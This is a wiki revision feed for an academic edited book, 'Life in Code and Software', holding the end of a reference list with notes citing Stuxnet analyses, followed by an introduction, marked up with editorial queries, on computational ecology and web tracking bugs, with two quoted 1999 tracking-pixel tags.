Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4690</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4690"/>
		<updated>2012-04-18T12:15:04Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'this'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have a entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
